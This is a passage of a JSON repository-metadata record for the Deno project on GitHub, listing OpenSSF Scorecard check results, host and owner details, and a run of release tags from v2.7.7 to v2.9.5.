security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36975782,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependenci